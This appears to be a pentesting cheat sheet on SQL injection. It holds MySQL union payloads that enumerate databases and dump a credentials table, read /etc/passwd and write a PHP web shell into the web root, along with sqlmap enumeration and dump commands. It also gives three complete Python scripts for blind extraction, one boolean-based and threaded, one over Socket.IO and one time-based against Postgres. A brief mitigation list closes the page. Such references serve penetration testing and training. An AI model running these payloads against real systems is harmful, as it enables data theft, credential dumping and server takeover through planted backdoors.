SQL Injection

A collection of SQL injection payloads, sqlmap commands, and sample exploitation scripts.

Terminators

;# (MySQL)
;-- - (MySQL)
;-- (Postgres)
/* (Postgres)

Basic Injection Examples

Detect number of columns using order by

' order by 1;-- - 	

Detect number of columns using Union injection

' UNION select 1,2,3;-- -

Get database version

' UNION select 1,@@version,3,4;-- -

Get current database name

' UNION select 1,database(),2,3;-- -

Database Enumeration

List all databases

' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA;-- - 	

List all tables in a specific database

' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev';-- -

List all columns in a specific table

' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials';-- - 

Dump data from a table in another database

' UNION select 1, username, password, 4 from dev.credentials;-- - 

Concat data together into 1 column

' UNION select 1, group_concat(username, password), 3, 4 from dev.credentials;-- - 	

File Injection

Read local file

' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4;-- - 	

Write a string to a local file

' UNION select 'file written successfully!' into outfile '/var/www/html/proof.txt';-- -

Write a web shell into the base web directory

' UNION select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php';-- - 	

Get Privileges

Find current user

' UNION SELECT 1, user(), 3, 4;-- - 	

Find if user has admin privileges

' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root";-- - 	

Find all user privileges

' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'";-- -

Find which directories can be accessed through MySQL

' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv";-- - 	

SQLMap

Generic SQLmap POST Request

$ sqlmap 'http://www.example.com/' --data 'uid=1&name=test' 

POST request specifying injection point with asterisks

$ sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' 	

Copy the HTTP request (POST or GET) to req.txt and pass it to sqlmap

$ sqlmap -r req.txt

Specifying other methods

$ sqlmap -u www.target.com --data='id=1' --method <METHOD>

Specifying a Prefix or Suffix to the injection

$ sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" 

Changing Risk and Level parameters for more aggressive testing

$ sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

Changes the SQL queries to use different syntaxes to bypass filters

$ sqlmap -u www.example.com/?id=1 -v 3 --tamper=between

Basic database enumeration and dumping

$ sqlmap -u "http://www.example.com/?id=1" --dbs 
$ sqlmap -u "http://www.example.com/?id=1" --tables -D testdb 	
$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

Passing CSRF token value

$ sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

If extracted characters come back garbled during blind SQL injection, use --hex

$ sqlmap -u "http://www.example.com/" --dbs --hex

Sample Scripts

Multi-threaded Blind SQL injection

import requests                                                
import threading
import time                                               
                                                               
# Target endpoint; BlindarySearch appends the injected payload to this string.
url = "http://url?q="

# Lower and upper bounds getLength hands to BlindarySearch for the result length.
MIN = 0

MAX = 1024

# Number of threads blindCompare starts (and then joins) per batch.
CHUNK_SIZE = 100

# Substring looked for in the response body to decide that a probe was true.
SUCCESS_STR = "Suggestions"
                                                               
def BlindarySearch(low, high, sql):
    """Binary-search the integer value of ``sql`` through a boolean oracle.

    Each step sends up to two GET requests built from the module-level
    ``url``: one testing ``sql = mid`` and, when that fails, one testing
    ``sql < mid``.  A probe counts as true when ``SUCCESS_STR`` appears in
    the response body.

    Args:
        low: Smallest candidate value (inclusive).
        high: Largest candidate value (inclusive).
        sql: SQL expression that is compared numerically against candidates.

    Returns:
        The candidate for which the equality probe succeeded.

    Raises:
        ValueError: If no value in ``[low, high]`` satisfies the equality
            probe.  The earlier recursive version had no base case for this
            and kept sending requests until it hit the recursion limit.
    """
    while low <= high:
        mid = (high + low) // 2

        # Equality probe; %23 is a URL-encoded '#', which comments out the
        # remainder of the original query.
        q = url + f"a')/**/or/**/{sql}={mid}%23"
        print(q)
        if SUCCESS_STR in requests.get(q).text:
            return mid

        # Not equal: find out which half of the range still holds the value.
        q = url + f"a')/**/or/**/{sql}<{mid}%23"
        if SUCCESS_STR in requests.get(q).text:
            high = mid - 1
        else:
            low = mid + 1

    raise ValueError(f"no value in the searched range satisfies {sql!r}")


def getLength(sql):
    """Return the length of the string produced by ``sql``.

    The query is wrapped in ``length((...))`` and resolved with
    BlindarySearch over the module-level ``MIN``..``MAX`` range.

    Args:
        sql: Query whose result length is wanted.

    Returns:
        The value BlindarySearch found for the length expression.
    """
    print("Finding Length...")
    length_sql = f"length(({sql}))"
    ans_len = BlindarySearch(MIN, MAX, length_sql)
    print(f"Length: {ans_len}")

    return ans_len


def chunker(seq, size):
    """Yield consecutive slices of ``seq`` holding at most ``size`` items."""
    offsets = range(0, len(seq), size)
    return (seq[start:start + size] for start in offsets)


def blindCompare(sql, ans_len):
    """Extract every character of the ``sql`` result using worker threads.

    One thread per 1-based character position runs getChar.  Threads are
    started in batches of ``CHUNK_SIZE`` and each batch is joined before the
    next one is started.
    """
    print(f"Extracting result for \"{sql}\"")

    workers = [
        threading.Thread(target=getChar, args=(position, sql))
        for position in range(1, ans_len + 1)
    ]

    print(f"Spawning {ans_len} threads")

    for batch in chunker(workers, CHUNK_SIZE):
        # Launch the whole batch before waiting on any of its members.
        for worker in batch:
            worker.start()

        for worker in batch:
            worker.join()


def getChar(pos, sql):
    """Recover the character at 1-based position ``pos`` of the ``sql`` result.

    The ASCII code is resolved with BlindarySearch over 32..127 and the
    decoded character is written to the module-level ``answer`` list at
    index ``pos - 1``.
    """
    global answer
    code_point = BlindarySearch(32, 127, f"ascii(substr(({sql}),{pos},1))")
    answer[pos - 1] = chr(code_point)
    print(f"Done {pos}")


if __name__=='__main__':
    t0 = time.time()

    # Alternative query to extract: "select @@version"
    sql = "select current_user()"

    # Every space is replaced by an inline comment before the query is injected.
    sql_nowhites = sql.replace(" ", "/**/")

    ans_len = getLength(sql_nowhites)

    # One slot per character, filled in by the getChar worker threads.
    # Slots start as the string "?" so that a worker that died still leaves
    # something ''.join() accepts; the former integer 0 placeholder made the
    # join raise TypeError and throw away everything already recovered.
    answer = ["?"] * ans_len

    blindCompare(sql_nowhites, ans_len)

    print(''.join(answer))

    print("done!")
    t1 = time.time()
    total = t1-t0
    print(f"Total time took: {total}s")

Single-Threaded Blind SQL injection. You would usually use this for asynchronous interactions, such as websockets

import time 
import socketio
                                       
# Socket.IO client used by the event handlers and by Emittor.
sio = socketio.Client()
                                       
@sio.event
def message(data):
    """Handler registered through ``sio.event``; prints the received payload."""
    print(data)

@sio.event
def emailFound(data):
    """Handler registered through ``sio.event``; records the payload as the reply.

    The payload is printed and stored in the module-level ``reply``, which
    BlindarySearch compares against ``SUCCESS_STR``.
    """
    global reply
    print(data)
    reply = data

                                       
# Connect at module load; Emittor sends its probes through this client.
sio.connect('http://url/socket.io/')


# Lower and upper bounds getLength hands to BlindarySearch for the result length.
MIN = 0

MAX = 500

# Value of `reply` that marks a probe as true.
SUCCESS_STR = True

# Latest payload stored by the emailFound handler; starts out as "no match".
reply = False

def Emittor(inj, wait=0.5):
    """Send one injected ``checkEmail`` event and give the reply time to arrive.

    Args:
        inj: Injection payload sent as the ``email`` field.
        wait: Seconds to sleep after emitting, so the ``emailFound`` handler
            can store the response in ``reply``.  Defaults to the previously
            hard-coded 0.5.
    """
    global reply
    # Forget the previous probe's answer first: otherwise a probe whose
    # response is late or never arrives would be judged on stale data.
    reply = False

    print(f"querying {inj}")
    sio.emit("checkEmail",{"email":inj,"token":"eUFeekMC4dTqKgppw5HjFPQZ1t7JuuMN"})
    time.sleep(wait)
                                                                                                                                                             
                                                                                                                                                             
def BlindarySearch(low, high, sql):
    """Binary-search the integer value of ``sql`` through a boolean oracle.

    Each step emits up to two probes via Emittor: one testing ``sql = mid``
    and, when that fails, one testing ``sql < mid``.  A probe counts as true
    when the module-level ``reply`` equals ``SUCCESS_STR`` afterwards.

    Args:
        low: Smallest candidate value (inclusive).
        high: Largest candidate value (inclusive).
        sql: SQL expression that is compared numerically against candidates.

    Returns:
        The candidate for which the equality probe succeeded.

    Raises:
        ValueError: If no value in ``[low, high]`` satisfies the equality
            probe.  The earlier recursive version had no base case for this
            and kept emitting probes until it hit the recursion limit.
    """
    while low <= high:
        mid = (high + low) // 2

        # Equality probe.
        Emittor(f"bb@gmail.com' or {sql}={mid};-- - ")
        if SUCCESS_STR == reply:
            return mid

        # Not equal: find out which half of the range still holds the value.
        Emittor(f"bb@gmail.com' or {sql}<{mid};-- - ")
        if SUCCESS_STR == reply:
            high = mid - 1
        else:
            low = mid + 1

    raise ValueError(f"no value in the searched range satisfies {sql!r}")

def getLength(sql):
    """Return the length of the string produced by ``sql``.

    The query is wrapped in ``length((...))`` and resolved with
    BlindarySearch over the module-level ``MIN``..``MAX`` range.

    Args:
        sql: Query whose result length is wanted.

    Returns:
        The value BlindarySearch found for the length expression.
    """
    print("Finding Length...")
    length_sql = f"length(({sql}))"
    ans_len = BlindarySearch(MIN, MAX, length_sql)
    print(f"Length: {ans_len}")

    return ans_len


def blindCompare(sql, ans_len):
    """Recover the ``sql`` result one character at a time, printing progress.

    Positions 1..``ans_len`` are resolved sequentially with getChar; the
    partial result is printed after every recovered character.
    """
    print(f"Extracting result for \"{sql}\"")

    recovered = ""

    for position in range(1, ans_len + 1):
        recovered = recovered + getChar(position, sql)
        print(recovered)


def getChar(pos, sql):
    """Return the character at 1-based position ``pos`` of the ``sql`` result.

    The ASCII code is resolved with BlindarySearch over 32..127.
    """
    code_point = BlindarySearch(32, 127, f"ascii(substr(({sql}),{pos},1))")
    return chr(code_point)


if __name__=='__main__':
    t0 = time.time()

    # Query whose output is extracted character by character.
    sql = "SELECT group_concat(column_name) as f FROM INFORMATION_SCHEMA.COLUMNS where table_name='Users'"

    try:
        ans_len = getLength(sql)

        blindCompare(sql, ans_len)
    finally:
        # Close the Socket.IO connection opened at module load, even when
        # the extraction aborts part-way through.
        sio.disconnect()

    print("done!")
    t1 = time.time()
    total = t1-t0
    print(f"Total time took: {total}s")

Sleep Injection with Postgres

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Seconds substituted for ^_SLEEP_^ in the probe, and the minimum extra
# latency time_query requires before it reports a match.
SLEEP = 5

# Injection point; note it already ends with ';' — presumably so the injected
# statement is stacked after the original one (confirm against the target).
url = "https://url?userId=1;"

# Query whose output is extracted character by character.
payload = "SELECT version()"

# Probe template; iterator_query fills in the ^_POS_^, ^_ASCII_^ and
# ^_SLEEP_^ markers.
inj = "SELECT CASE WHEN(ASCII(SUBSTR(("+payload+"),^_POS_^,1))=^_ASCII_^) THEN pg_sleep(^_SLEEP_^) END;"

def convert(inj):
    """Prepare an injection template for use in the request URL.

    Spaces become ``+``, single quotes become ``$$`` and ``--+`` is
    appended to the result.
    """
    encoded = inj.replace(" ", "+").replace("'", "$$")
    return f"{encoded}--+"
   
def time_query(url, conv_inj_replaced):
    """Report whether the injected request is slower than a plain one by SLEEP.

    Two GET requests are made with certificate verification disabled: one
    to ``url`` as a baseline and one to ``url`` with the payload appended.

    Returns:
        True when the rounded difference in elapsed seconds is at least
        ``SLEEP``, otherwise False.
    """
    # Baseline: the untouched URL.
    print("Doing base query")
    baseline = requests.get(url, verify=False).elapsed.total_seconds()

    # Same URL with the sleep payload appended.
    print("Doing delayed query")
    delayed = requests.get(url + conv_inj_replaced, verify=False).elapsed.total_seconds()

    # The rounded extra latency has to reach SLEEP for the probe to count.
    return round(delayed - baseline) >= SLEEP

def iterator_query(url, conv_inj):
    """Brute-force the payload output character by character via timing.

    For each position 1..99, every printable ASCII code is substituted into
    the probe template and tested with time_query; the first code that
    triggers the delay is appended to the result.  Positions where no
    candidate triggers the delay contribute nothing.

    Args:
        url: Injection point the probe is appended to.
        conv_inj: Probe template containing the ``^_POS_^``, ``^_ASCII_^``
            and ``^_SLEEP_^`` markers.

    Returns:
        The recovered string.  Earlier versions built it but returned None.
    """
    answer = ""
    for pos in range(1, 100):
        # Position and delay are the same for every candidate character, so
        # substitute them once per position.
        positioned = conv_inj.replace('^_POS_^', str(pos)).replace('^_SLEEP_^', str(SLEEP))

        # Printable ASCII including the space (32); the former 33..126 range
        # could never match a space and silently dropped it from the output.
        for char in range(32, 127):
            conv_inj_replaced = positioned.replace('^_ASCII_^', str(char))

            print(conv_inj_replaced)

            if time_query(url, conv_inj_replaced):
                print("found!")
                answer += chr(char)
                print(answer)
                break

    return answer
            

if __name__=='__main__':
    # Encode the probe template so it can be appended to the URL.
    conv_inj = convert(inj)
    
    # Run the character-by-character extraction against the target.
    iterator_query(url, conv_inj)

Mitigation

  • Input Sanitization on Front-end, Back-end

  • Input Validation on Front-end, Back-end

  • Proper MySQL user Privileges

    • Don't grant privileges on all tables

    • Don't run as root

  • WAF to detect and block attacks

  • Parameterized SQL Queries to prevent user input injection

Last updated